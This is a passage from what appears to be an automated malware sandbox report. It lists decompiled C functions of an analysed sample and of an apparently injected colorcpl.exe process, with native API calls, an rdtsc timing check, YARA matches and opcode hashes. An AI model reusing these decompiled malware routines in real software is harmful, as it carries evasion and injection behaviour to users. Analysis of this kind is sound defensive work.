				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191D0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                    0x004187bf
                                                    0x004187c7
                                                    0x004187e9
                                                    0x004187ed

                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                    • Instruction ID: 71e408db6ffae62f38499a7299b3f2ec9839ba1f647d0a7234910b9a40a1f481
                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                    • Instruction Fuzzy Hash: 07F015B2200208ABDB18DF89CC85EEB77ADAF88754F158149FE0897241C630F810CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004186FB, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004186FB(void* __eax, intOrPtr _a4, void* _a8) {
				long _t14;
				void* _t18;

				_t11 = _a4;
				_t6 = _t11 + 0x10; // 0x300
				_t7 = _t11 + 0xc50; // 0x409753
				E004191D0(_t18, _a4, _t7,  *_t6, 0, 0x2c);
				_t14 = NtClose(_a8); // executed
				return _t14;
			}





                                                    0x00418703
                                                    0x00418706
                                                    0x0041870f
                                                    0x00418717
                                                    0x00418725
                                                    0x00418729

                                                    APIs
                                                    • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: b44743663bd0e1e0445ed0e3c9b5bc4212c4f8d467fd3034acd08da694b14433
                                                    • Instruction ID: 0810284070dfd8765618d9814fb2be3627ea47f6e951ab7df9c05eb14fc129a4
                                                    • Opcode Fuzzy Hash: b44743663bd0e1e0445ed0e3c9b5bc4212c4f8d467fd3034acd08da694b14433
                                                    • Instruction Fuzzy Hash: 4DE08C35204204ABE714EB98CC49E973768EB48360F044459FA085B242C530E94086D0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418700, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00418700(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409753
				E004191D0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                    0x00418703
                                                    0x00418706
                                                    0x0041870f
                                                    0x00418717
                                                    0x00418725
                                                    0x00418729

                                                    APIs
                                                    • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                    • Instruction ID: 315d70e0dd0a86a48429d20d502ae4ae3fb499c677b3512a188e9811668946a9
                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                    • Instruction Fuzzy Hash: 17D01776200218BBE714EB99CC89EE77BACEF48760F154499BA189B242C570FA4086E0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004088C0, Relevance: .1, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 93%
                                                    			E004088C0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E10(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407020( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041A0E0( &_v284, 0x104);
						E0041A750( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DE0(E00413D80(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407050( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070D0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                    0x004088cb
                                                    0x004088d3
                                                    0x004088d5
                                                    0x004088da
                                                    0x004088df
                                                    0x004088f2
                                                    0x004088f7
                                                    0x00408900
                                                    0x0040890c
                                                    0x0040891f
                                                    0x00408924
                                                    0x00408927
                                                    0x00408930
                                                    0x00408942
                                                    0x00408947
                                                    0x0040894c
                                                    0x00000000
                                                    0x00000000
                                                    0x0040894e
                                                    0x00408952
                                                    0x00000000
                                                    0x00000000
                                                    0x00408954
                                                    0x00000000
                                                    0x00408952
                                                    0x00408956
                                                    0x00408959
                                                    0x0040895f
                                                    0x00408961
                                                    0x0040896c
                                                    0x00408971
                                                    0x00408974
                                                    0x00408981
                                                    0x0040898c
                                                    0x0040898e
                                                    0x00408994
                                                    0x00408998
                                                    0x0040899b
                                                    0x0040899b
                                                    0x004089a2
                                                    0x004089a5
                                                    0x004089aa
                                                    0x004089b7
                                                    0x004088e6
                                                    0x004088e6
                                                    0x004088e6

                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                                    • Instruction ID: 8d10d9d25de9ec3e6def201a299ec9bf42c948c309616648182b8fd41abd7787
                                                    • Opcode Fuzzy Hash: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                                    • Instruction Fuzzy Hash: 54212BB2D442085BCB11E6609D42BFF736C9B54304F04017FE989A2181FA38AB498BA7
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418912, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID: E|@D
                                                    • API String ID: 621844428-1370303659
                                                    • Opcode ID: 66a796d0ebfff3f9d5785c6ed58b8e05b27a6136a39288f6f4f9432df0981e0b
                                                    • Instruction ID: e895c59ff5785fe79b81943ebcb3a64fc83d15124883f7b35492da766616fb8c
                                                    • Opcode Fuzzy Hash: 66a796d0ebfff3f9d5785c6ed58b8e05b27a6136a39288f6f4f9432df0981e0b
                                                    • Instruction Fuzzy Hash: 2B11F5B6211208BBDB18DF99CC85EEB77A9AF8C754F158258FE4D97241C630E940CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004188A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004188A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191D0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                                    0x004188b7
                                                    0x004188c2
                                                    0x004188cd
                                                    0x004188d1

                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188CD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID: &5A
                                                    • API String ID: 1279760036-1617645808
                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                    • Instruction ID: 5cd9cf05846361427c9380675d72c553918c9354c3ac6328093719e9b08428cf
                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                    • Instruction Fuzzy Hash: 8DE012B1200208ABDB18EF99CC45EA777ACAF88654F158559FE085B242C630F910CAB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00407270, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 82%
                                                    			E00407270(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041A130( &_v67, 0, 0x3f);
				E0041AD10( &_v68, 3);
				_t12 = E00409B30(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                    0x00407270
                                                    0x0040727f
                                                    0x00407283
                                                    0x0040728e
                                                    0x0040729e
                                                    0x004072ae
                                                    0x004072b3
                                                    0x004072ba
                                                    0x004072bd
                                                    0x004072ca
                                                    0x004072cc
                                                    0x004072ce
                                                    0x004072eb
                                                    0x004072eb
                                                    0x00000000
                                                    0x004072ed
                                                    0x004072f2

                                                    APIs
                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID:
                                                    • API String ID: 1836367815-0
                                                    • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                    • Instruction ID: c56ba0c085939b8c42c795c32c14b578f190c8095243a7543fabada8e08a803b
                                                    • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                    • Instruction Fuzzy Hash: 13018431A8022877E720AA959C03FFE776C5B00B55F15416EFF04BA1C2E6A8790546EA
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004188D2, Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 65%
                                                    			E004188D2(void* __eax, unsigned int __ebx, signed int __ecx, void* __edi, void* _a4, long _a8, void* _a12) {
				intOrPtr _v0;
				intOrPtr _t10;
				char _t14;
				void* _t24;

				_t24 = __edi + 0xffffffc6;
				_t10 = (__ebx >> __ecx) + 1;
				asm("lodsd");
				asm("rep lodsd");
				_push(_t10);
				 *0x8b55a8e4 = _t10;
				_t11 = _v0;
				_t4 = _t11 + 0xc74; // 0xc74
				E004191D0(_t24, _v0, _t4,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
				_t14 = RtlFreeHeap(_a4, _a8, _a12); // executed
				return _t14;
			}







                                                    0x004188d4
                                                    0x004188d8
                                                    0x004188d9
                                                    0x004188da
                                                    0x004188dc
                                                    0x004188dd
                                                    0x004188e3
                                                    0x004188ef
                                                    0x004188f7
                                                    0x0041890d
                                                    0x00418911

                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: 67d82495b4063692c91892c48db61b0093108501fc37c852910822e860be5df8
                                                    • Instruction ID: d0155fad79ad0b948d62ddc79bec75bb1eaa1d629c12d81e7d1ba5b31236321b
                                                    • Opcode Fuzzy Hash: 67d82495b4063692c91892c48db61b0093108501fc37c852910822e860be5df8
                                                    • Instruction Fuzzy Hash: 86F0A9B1240604AFDB04CF28CC48EE737ADEF89320F144219B91ECB282C230E9018AB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004188E0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004188E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191D0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                    0x004188ef
                                                    0x004188f7
                                                    0x0041890d
                                                    0x00418911

                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeHeap
                                                    • String ID:
                                                    • API String ID: 3298025750-0
                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                    • Instruction ID: d5064c9333f2c86e90799a0952281b4505df08c213c274bd60dc18c3aad5e7c3
                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                    • Instruction Fuzzy Hash: D6E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FE085B242C630E910CAB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418A40, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00418A40(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191D0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                    0x00418a5a
                                                    0x00418a70
                                                    0x00418a74

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                    • Instruction ID: 94a67e7d56b84cdac76e00d2984c4843b75a07e867f03accef92050f0623a7c7
                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                    • Instruction Fuzzy Hash: 2AE01AB12002086BDB14DF49CC85EE737ADAF88650F018155FE0857241C934E8508BF5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418920, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00418920(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191D0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                    0x00418923
                                                    0x0041893a
                                                    0x00418948

                                                    APIs
                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcess
                                                    • String ID:
                                                    • API String ID: 621844428-0
                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                    • Instruction ID: e5768b9f518b8de78fd4a208f412dfdc851767aa697c2aafb91b43477ac04d56
                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                    • Instruction Fuzzy Hash: 99D012716002187BD624DB99CC89FD7779CDF48790F058065BA1C5B241C571BA00C6E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Function 0041625A, Relevance: .1, Instructions: 60COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dd9626dc1f7a7d480f5fa0fa4dadd97e85d0233cc0bdc983d065c8ff21923f8c
                                                    • Instruction ID: d8d736f80c120d99af92767b070d3f73c40cfad4e4bc8d79b82cf363fc090f77
                                                    • Opcode Fuzzy Hash: dd9626dc1f7a7d480f5fa0fa4dadd97e85d0233cc0bdc983d065c8ff21923f8c
                                                    • Instruction Fuzzy Hash: CA018E767496804BC3528E7DDCC41DEFB57BBC226071405AEE0909F681D6218047C3A8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040C3D2, Relevance: .0, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.450526956.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 188eb92cc5218b2bc821d0e6f3f127cf7965abec9c6822a5f14355cade1b807b
                                                    • Instruction ID: ea5f96915f6c7f619361df7a1f506267b992d222be2908fc3088c97ecacb800d
                                                    • Opcode Fuzzy Hash: 188eb92cc5218b2bc821d0e6f3f127cf7965abec9c6822a5f14355cade1b807b
                                                    • Instruction Fuzzy Hash: DBF04636B142911AC3129FBEBC529E5FB649BC2324F0446EFE488E7183D621811C87A8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Analysis Process: colorcpl.exe PID: 6788 Parent PID: 3440 colorcpl.exeCOMMON

                                                    Executed Functions

                                                    Function 009785CA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00973BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00973BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0097861D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID: .z`
                                                    • API String ID: 823142352-1441809116
                                                    • Opcode ID: 3e423702255ab8f3850fb248a0caa070f0043465ee08bb6088e916a5cca17d32
                                                    • Instruction ID: 4a5498d3902c1b74042ce9c4bd3b53541860f78a67368e40ab0ac340dea5782c
                                                    • Opcode Fuzzy Hash: 3e423702255ab8f3850fb248a0caa070f0043465ee08bb6088e916a5cca17d32
                                                    • Instruction Fuzzy Hash: 8501ABB2204208AFDB48CF88DC95EEB37ADAF8C754F158258BA0DD7241D630E851CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 009785D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00000000,.z`,00973BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00973BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0097861D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID: .z`
                                                    • API String ID: 823142352-1441809116
                                                    • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                    • Instruction ID: d18b3634f02cd242a15b2aed1d11b0331772c1e06b42c7b69d8ab41217cd4dec
                                                    • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                    • Instruction Fuzzy Hash: 42F0BDB2204208AFCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E811CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00978680, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtReadFile.NTDLL(00973D62,5E972F61,FFFFFFFF,00973A21,?,?,00973D62,?,00973A21,FFFFFFFF,5E972F61,00973D62,?,00000000), ref: 009786C5
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                    • Instruction ID: fb8aad0684b7ec7254aac63b36105e37333ce6ab8dcc3755266842560a1deb0b
                                                    • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                    • Instruction Fuzzy Hash: C1F0A4B2200208AFCB18DF89DC85EEB77ADEF8C754F158248BE1D97241D630E811CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0097867C, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtReadFile.NTDLL(00973D62,5E972F61,FFFFFFFF,00973A21,?,?,00973D62,?,00973A21,FFFFFFFF,5E972F61,00973D62,?,00000000), ref: 009786C5
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: fb08f70ddd354952e7caf65d046407b2731cd27fc48768cb9aafaba92d35f217
                                                    • Instruction ID: d8c834bc21f0d38fe507409422dbfdea0cd350f3cd7b97c0a1fdf898699990b1
                                                    • Opcode Fuzzy Hash: fb08f70ddd354952e7caf65d046407b2731cd27fc48768cb9aafaba92d35f217
                                                    • Instruction Fuzzy Hash: 17F0A4B6200108AFCB18DF89DC85EEB77A9EF8C754F158649BE1D97241D630E951CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 009787B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00962D11,00002000,00003000,00000004), ref: 009787E9
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                    • Instruction ID: 6a65891773faa1ba9ea9b8ec6e0247190e7c9363f2a55f2b803f8305b8663cfb
                                                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                    • Instruction Fuzzy Hash: C0F015B2200208AFCB18DF89CC81EAB77ADEF88750F118148BE0897241C630F810CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 009787AC, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00962D11,00002000,00003000,00000004), ref: 009787E9
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: 6e5cde00e7fd1c25f4468e484f6a1eb2673e9a8e29ad29c7851185cd71188427
                                                    • Instruction ID: 2a48bbcfa585eb7a1fe4e026c0922e03ab7208d71aa92c9a93b051b5244c2941
                                                    • Opcode Fuzzy Hash: 6e5cde00e7fd1c25f4468e484f6a1eb2673e9a8e29ad29c7851185cd71188427
                                                    • Instruction Fuzzy Hash: E5F015B6200109AFDB18DF88DC85EEB77ADEF88350F118549BE08A7241D630E810CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 009786FB, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtClose.NTDLL(00973D40,?,?,00973D40,00000000,FFFFFFFF), ref: 00978725
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 26563e9e44d9bab3f41716252c4c8375b9e930966a4ffb389a63d2586c7c3df0
                                                    • Instruction ID: 3367f1c39bebe4841c028d13ecac4c3c1d57fb78d7a111ac2688545e81f04b78
                                                    • Opcode Fuzzy Hash: 26563e9e44d9bab3f41716252c4c8375b9e930966a4ffb389a63d2586c7c3df0
                                                    • Instruction Fuzzy Hash: 64E08C36204204AFE714EB98CC49E973768EB48320F004458FA085B242C530E50086D0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00978700, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtClose.NTDLL(00973D40,?,?,00973D40,00000000,FFFFFFFF), ref: 00978725
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.613983014.0000000000960000.00000040.00020000.sdmp, Offset: 00960000, based on PE: false
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
